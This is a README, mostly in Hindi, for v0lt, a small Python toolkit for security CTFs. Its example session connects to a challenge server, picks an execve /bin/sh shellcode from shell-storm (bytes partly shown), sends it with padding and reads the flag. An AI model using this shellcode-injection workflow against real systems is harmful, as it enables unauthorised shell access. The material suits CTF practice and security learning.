
सुरक्षा CTF टूलकिट (अब रखरखाव नहीं किया जाता)

v0lt सुरक्षा CTF में मेरे द्वारा उपयोग/उपयोग कर रहे/करने वाले हर टूल को पुनः समूहित करने का एक प्रयास है, पायथन शैली में। बहुत सारे अभ्यास बैश स्क्रिप्ट का उपयोग करके हल किए गए थे लेकिन पायथन अधिक लचीला हो सकता है, इसीलिए। इसका गैलोप्सलेड से कोई लेना-देना नहीं है। यह एक खिलौना टूलकिट है, जिसमें केवल छोटी लेकिन विशिष्ट उपयोगिताएँ हैं।
यह प्रोजेक्ट अब बनाए नहीं रखा जा रहा है, क्योंकि उपयोगिताएँ स्वयं इतनी छोटी हैं कि लगभग हमेशा बिना किसी रखरखाव की आवश्यकता के काम कर सकती हैं। यदि आप चाहें तो PRs सबमिट करने में संकोच न करें :)
# for v0lt install
git clone https://github.com/P1kachu/v0lt.git
cd v0lt
[sudo] python3 setup.py install # sudo is required for potentially missing dependencies
>>> from v0lt import *
>>> nc = Netcat("archpichu.ddns.net", 65102)
Connected to port 65102
>>> print(nc.read())
GIVE ME SHELLCODZ
>>> shellhack = ShellCrafter(4096, "bin","execve")
>>> shellhack.get_shellcodes(shellhack.keywords)
...<SNIPPED>...
85: Linux/x86:setuid(0) & execve(/sbin/poweroff -f) - 47 bytes
86: Linux/x86:execve (/bin/sh) - 21 Bytes
87: Linux/x86:break chroot execve /bin/sh - 80 bytes
88: Linux/x86:execve(/bin/sh,0,0) - 21 bytes
...<SNIPPED>...
Selection: 86
Your choice: http://shell-storm.org/shellcode/files/shellcode-752.php
Shellcode: "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]"
>>> nc.shellcat(shellhack.shellcode)
>>> nc.writeln(shellhack.pad())
>>> exploit = nc.dialogue("cat flag", 3)
>>> print(exploit)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
File name too long
P1kaCTF{sh3llc0de_1s_e4zY}
क्रिप्टो
शेलकोड्स
आसान कनेक्शन समर्थन
समाधान
और अधिक
उदाहरण उपलब्ध हैं